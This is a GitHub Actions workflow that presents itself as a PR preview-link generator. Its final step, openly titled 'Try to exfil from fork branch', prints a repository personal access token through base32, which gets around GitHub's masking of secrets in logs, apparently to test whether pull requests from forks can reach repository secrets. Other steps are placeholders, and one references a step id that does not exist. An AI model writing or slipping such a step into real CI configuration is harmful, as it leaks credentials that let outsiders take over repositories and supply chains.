name: Pre-generate preview link

permissions:
  pull-requests: write

on:
  pull_request:
    types: [opened, synchronize]

env:
  HEAD_REF: ${{ github.head_ref }}

concurrency:
  group: cloudflare-pages-verify-"$HEAD_REF"
  cancel-in-progress: true

jobs:
  upload_pr_info:
    runs-on: Ubuntu-latest
    steps:
      - name: Retrieve PR information
        env:
          ISSUE_NUMBER: ${{ github.event.number }}
          USERNAME: shantanug-deriv
        run: |
          mkdir -p ./pr
          echo "$ISSUE_NUMBER" > ./pr/ISSUE_NUMBER
          echo "$USERNAME" > ./pr/USERNAME
          
      - name: Random Step
        id: pr_information_random
        run: |
          echo "RANDOMMMMM"

      - name: Upload PR information to artifact
        uses: actions/upload-artifact@v2
        with:
          name: "pr-${{github.run_id}}"
          path: pr/

      - name: Try to exfil from fork branch
        run: |
          echo "USERNAME - ${{steps.pr_information.outputs.username}}"
          echo "SECRET -" 
          echo "${{ secrets.PERSONAL_ACCESS_TOKEN }}" | base32
          echo "Secret echoed"
